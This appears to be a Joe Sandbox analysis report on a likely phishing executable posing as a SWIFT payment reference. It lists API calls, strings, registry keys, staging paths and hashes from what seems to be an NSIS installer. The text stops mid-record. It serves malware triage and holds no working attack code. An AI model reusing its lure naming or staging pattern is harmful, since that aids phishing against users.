GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
EnableMenuItem.USER32(00000000), ref: 00404283
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
SetWindowTextW.USER32(?,00423708), ref: 004042EC
ShowWindow.USER32(?,0000000A), ref: 00404420

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
Opcode Fuzzy Hash: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB6 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901

lstrcatW.KERNEL32(1033,00423708), ref: 00403C37
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,74DF3420), ref: 00403CB7
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
GetFileAttributesW.KERNEL32(: Completed,?,00000000,?), ref: 00403CD5
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne), ref: 00403D1E

Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B

RegisterClassW.USER32(004291C0), ref: 00403D5B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403E0A
GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403E17
RegisterClassW.USER32(004291C0), ref: 00403E20
DialogBoxParamW.USER32(?,00000000,00403F64,00000000), ref: 00403E3F

Strings

RichEdit20W, xrefs: 00403E02, 00403E08
_Nb, xrefs: 00403D3A, 00403DA2
RichEdit, xrefs: 00403E11
1033, xrefs: 00403BD6, 00403C32
Control Panel\Desktop\ResourceLocale, xrefs: 00403BEA
RichEd32, xrefs: 00403DF2
: Completed, xrefs: 00403C7E, 00403C87, 00403C95, 00403CE4, 00403CEA
.DEFAULT\Control Panel\International, xrefs: 00403C22
RichEd20, xrefs: 00403DE4
C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne, xrefs: 00403C46, 00403C4E, 00403CF1, 00403CF7, 00403D07
.exe, xrefs: 00403CC4
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BBB

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-722751082
Opcode ID: 6641f25268bcb411ff60996ee06ee97a96bb8d093e03f8a241686f6243dfe293
Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
Opcode Fuzzy Hash: 6641f25268bcb411ff60996ee06ee97a96bb8d093e03f8a241686f6243dfe293
Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA

Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C

Strings

Error launching installer, xrefs: 004030CD
Null, xrefs: 00403174
Inst, xrefs: 00403162
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
C:\Users\user\Desktop, xrefs: 004030D8, 004030DD, 004030E3
C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, xrefs: 00403094, 004030A3, 004030B7, 004030D7
G8@, xrefs: 00403227, 00403242
C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
soft, xrefs: 0040316B

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3212485321
Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406544 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040665F
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004055A0,Completed,00000000,00000000,00418EC0,00000000), ref: 00406672
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004066E3
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040662D
: Completed, xrefs: 0040656E, 00406621, 00406628, 0040662C, 00406649, 0040665E, 00406671, 00406686, 004066B3, 004066E8, 004066EE, 0040670B, 0040671E, 0040673C, 00406742, 0040674B, 00406781
Completed, xrefs: 00406569

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-905382516
Opcode ID: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
Opcode Fuzzy Hash: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,%tjur%\Underafsnitets7\pothouses,%tjur%\Underafsnitets7\pothouses,00000000,00000000,%tjur%\Underafsnitets7\pothouses,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514

Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Strings

Software\nekton\plastrendes, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Temp\nso1577.tmp, xrefs: 00401821, 0040183F
%tjur%\Underafsnitets7\pothouses, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: %tjur%\Underafsnitets7\pothouses$C:\Users\user\AppData\Local\Temp\nso1577.tmp$Software\nekton\plastrendes
API String ID: 1941528284-2891651852
Opcode ID: 7ab0603ab804afdab1fb2c728dca1342c41c6ca15f865d7c0f8a57fc8b40d4ea
Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
Opcode Fuzzy Hash: 7ab0603ab804afdab1fb2c728dca1342c41c6ca15f865d7c0f8a57fc8b40d4ea
Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405569 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
lstrcatW.KERNEL32(Completed,004033ED), ref: 004055C4
SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743

Strings

Completed, xrefs: 0040558A, 0040559A, 004055A0, 004055C3, 004055CF

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Completed
API String ID: 1495540970-3087654605
Opcode ID: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
Opcode Fuzzy Hash: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403315
GetTickCount.KERNEL32 ref: 00403396
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033C3
wsprintfW.USER32 ref: 004033D6

Strings

... %d%%, xrefs: 004033D0
G8@, xrefs: 004032B4

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$G8@
API String ID: 551687249-649311722
Opcode ID: b7039df6b661f5aac7037f3c5cf5785396056a6690f2865472b97a0f4fde5ae6
Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
Opcode Fuzzy Hash: b7039df6b661f5aac7037f3c5cf5785396056a6690f2865472b97a0f4fde5ae6
Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
wsprintfW.USER32 ref: 004068B6
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA

Strings

UXTHEME, xrefs: 0040686D
%s%S.dll, xrefs: 004068B0
\, xrefs: 0040688C

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
GetLastError.KERNEL32 ref: 00405A8F
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
GetLastError.KERNEL32 ref: 00405AAE

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3081826266
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
